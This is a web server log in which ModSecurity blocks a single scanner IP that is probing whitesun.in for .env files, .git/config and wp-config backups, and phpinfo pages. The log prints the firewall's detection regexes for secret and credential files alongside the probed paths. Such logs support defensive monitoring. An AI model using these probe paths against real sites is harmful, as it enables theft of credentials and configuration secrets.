[Tue May 26 13:39:37.438849 2026] [security2:error] [pid 536875:tid 537072] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.env~"] [unique_id "ahVVQer_-FTveSGlx1HqlwAAAMg"]
[Tue May 26 13:39:37.523341 2026] [security2:error] [pid 544395:tid 544575] [client 45.148.10.95:9760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config~"] [unique_id "ahVVQRmrs7g3RMCdp8XJGgAAADI"]
[Tue May 26 13:39:37.602798 2026] [security2:error] [pid 544395:tid 544651] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVQRmrs7g3RMCdp8XJBAAAAH4"]
[Tue May 26 13:39:37.609387 2026] [security2:error] [pid 544395:tid 544648] [client 45.148.10.95:9812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.bak"] [unique_id "ahVVQRmrs7g3RMCdp8XJHAAAAHs"]
[Tue May 26 13:39:37.612156 2026] [security2:error] [pid 544395:tid 544541] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/.git/config.old"] [unique_id "ahVVQRmrs7g3RMCdp8XJHQAAABA"]
[Tue May 26 13:39:38.969025 2026] [security2:error] [pid 544395:tid 544594] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVQhmrs7g3RMCdp8XJOgAAAEU"]
[Tue May 26 13:39:39.734482 2026] [security2:error] [pid 544395:tid 544550] [client 45.148.10.95:9680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/.wp-config.php.swp"] [unique_id "ahVVQxmrs7g3RMCdp8XJYQAAABk"]
[Tue May 26 13:39:39.800319 2026] [autoindex:error] [pid 544395:tid 544553] [client 45.148.10.95:9768] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:39.807814 2026] [autoindex:error] [pid 544395:tid 544587] [client 45.148.10.95:9812] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:39.875859 2026] [security2:error] [pid 544395:tid 544651] [client 45.148.10.95:9834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/ADMIN/.env"] [unique_id "ahVVQxmrs7g3RMCdp8XJaAAAAH4"]
[Tue May 26 13:39:40.041393 2026] [autoindex:error] [pid 544395:tid 544623] [client 45.148.10.95:9768] AH01276: Cannot serve directory /home2/whitece9/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:40.234443 2026] [security2:error] [pid 536875:tid 537083] [client 45.148.10.95:9880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACK/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq2QAAANM"]
[Tue May 26 13:39:40.279971 2026] [security2:error] [pid 544395:tid 544571] [client 45.148.10.95:9700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/API/.env"] [unique_id "ahVVRBmrs7g3RMCdp8XJcgAAAC4"]
[Tue May 26 13:39:40.396661 2026] [security2:error] [pid 536875:tid 537054] [client 45.148.10.95:9864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Be/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq2wAAALY"]
[Tue May 26 13:39:40.397014 2026] [security2:error] [pid 536875:tid 537032] [client 45.148.10.95:9796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/APP/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq3AAAAKA"]
[Tue May 26 13:39:40.492507 2026] [security2:error] [pid 544395:tid 544605] [client 45.148.10.95:9834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Api/.env"] [unique_id "ahVVRBmrs7g3RMCdp8XJdwAAAFA"]
[Tue May 26 13:39:40.570391 2026] [security2:error] [pid 536875:tid 537013] [client 45.148.10.95:9696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BACKEND/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq3wAAAI0"]
[Tue May 26 13:39:40.596739 2026] [security2:error] [pid 544395:tid 544613] [client 45.148.10.95:9744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/Backend/.env"] [unique_id "ahVVRBmrs7g3RMCdp8XJfAAAAFg"]
[Tue May 26 13:39:40.692854 2026] [security2:error] [pid 536875:tid 537044] [client 45.148.10.95:9796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/BE/.env"] [unique_id "ahVVROr_-FTveSGlx1Hq5wAAAKw"]
[Tue May 26 13:39:40.971503 2026] [security2:error] [pid 544395:tid 544538] [client 45.148.10.95:9878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVVRBmrs7g3RMCdp8XJkgAAAA0"]
[Tue May 26 13:39:41.082366 2026] [security2:error] [pid 544395:tid 544598] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/admin-app/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJlwAAAEk"]
[Tue May 26 13:39:41.222977 2026] [security2:error] [pid 544395:tid 544536] [client 45.148.10.95:9744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/admin/phpinfo.php"] [unique_id "ahVVRRmrs7g3RMCdp8XJnAAAAAs"]
[Tue May 26 13:39:41.229022 2026] [security2:error] [pid 544395:tid 544603] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/administrator/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJnQAAAE4"]
[Tue May 26 13:39:41.240398 2026] [security2:error] [pid 544395:tid 544620] [client 45.148.10.95:9768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api-backend/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJngAAAF8"]
[Tue May 26 13:39:41.267902 2026] [security2:error] [pid 536875:tid 537129] [client 45.148.10.95:9782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api/.env"] [unique_id "ahVVRer_-FTveSGlx1Hq_QAAAQE"]
[Tue May 26 13:39:41.272696 2026] [security2:error] [pid 536875:tid 537028] [client 45.148.10.95:9796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/admin_phpinfo.php"] [unique_id "ahVVRer_-FTveSGlx1Hq_gAAAJw"]
[Tue May 26 13:39:41.312732 2026] [security2:error] [pid 544395:tid 544542] [client 45.148.10.95:9848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/api-node/.env"] [unique_id "ahVVRRmrs7g3RMCdp8XJpwAAABE"]
[Tue May 26 13:39:41.457860 2026] [security2:error] [pid 544395:tid 544560] [client 45.148.10.95:9834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/api/info.php"] [unique_id "ahVVRRmrs7g3RMCdp8XJrAAAACM"]
[Tue May 26 13:39:41.521478 2026] [security2:error] [pid 536875:tid 537110] [client 45.148.10.95:9872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/api/phpinfo.php"] [unique_id "ahVVRer_-FTveSGlx1HrEwAAAO4"]
[Tue May 26 13:39:41.768846 2026] [security2:error] [pid 536875:tid 537087] [client 45.148.10.95:9788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/apis/.env"] [unique_id "ahVVRer_-FTveSGlx1HrIAAAANc"]
[Tue May 26 13:39:41.810083 2026] [security2:error] [pid 536875:tid 537059] [client 45.148.10.95:9880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/app/.env"] [unique_id "ahVVRer_-FTveSGlx1HrIwAAALs"]
[Tue May 26 13:39:41.869681 2026] [security2:error] [pid 536875:tid 537010] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVRer_-FTveSGlx1HrDAAAAIo"]
[Tue May 26 13:39:42.070533 2026] [security2:error] [pid 544395:tid 544643] [client 45.148.10.95:39874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/apps/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJzAAAAHY"]
[Tue May 26 13:39:42.092398 2026] [security2:error] [pid 536875:tid 537013] [client 45.148.10.95:9730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/application/.env"] [unique_id "ahVVRur_-FTveSGlx1HrMwAAAI0"]
[Tue May 26 13:39:42.407006 2026] [security2:error] [pid 536875:tid 537079] [client 45.148.10.95:9880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back-api/.env"] [unique_id "ahVVRur_-FTveSGlx1HrRwAAAM8"]
[Tue May 26 13:39:42.408193 2026] [security2:error] [pid 544395:tid 544642] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back-end/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ4gAAAHU"]
[Tue May 26 13:39:42.458864 2026] [security2:error] [pid 544395:tid 544645] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/back/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ4wAAAHg"]
[Tue May 26 13:39:42.467484 2026] [security2:error] [pid 536875:tid 537041] [client 45.148.10.95:39878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend-api/.env"] [unique_id "ahVVRur_-FTveSGlx1HrSwAAAKk"]
[Tue May 26 13:39:42.468677 2026] [security2:error] [pid 544395:tid 544537] [client 45.148.10.95:39912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backend/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ5AAAAAw"]
[Tue May 26 13:39:42.599154 2026] [security2:error] [pid 544395:tid 544530] [client 45.148.10.95:9812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/backup/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ6gAAAAU"]
[Tue May 26 13:39:42.612455 2026] [security2:error] [pid 536875:tid 537118] [client 45.148.10.95:9782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/beta/.env"] [unique_id "ahVVRur_-FTveSGlx1HrUwAAAPY"]
[Tue May 26 13:39:42.638607 2026] [security2:error] [pid 536875:tid 537058] [client 45.148.10.95:9788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/be/.env"] [unique_id "ahVVRur_-FTveSGlx1HrVAAAALo"]
[Tue May 26 13:39:42.761950 2026] [security2:error] [pid 544395:tid 544555] [client 45.148.10.95:9824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/client/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ8AAAAB4"]
[Tue May 26 13:39:42.790411 2026] [security2:error] [pid 544395:tid 544532] [client 45.148.10.95:39910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/cms/.env"] [unique_id "ahVVRhmrs7g3RMCdp8XJ8wAAAAc"]
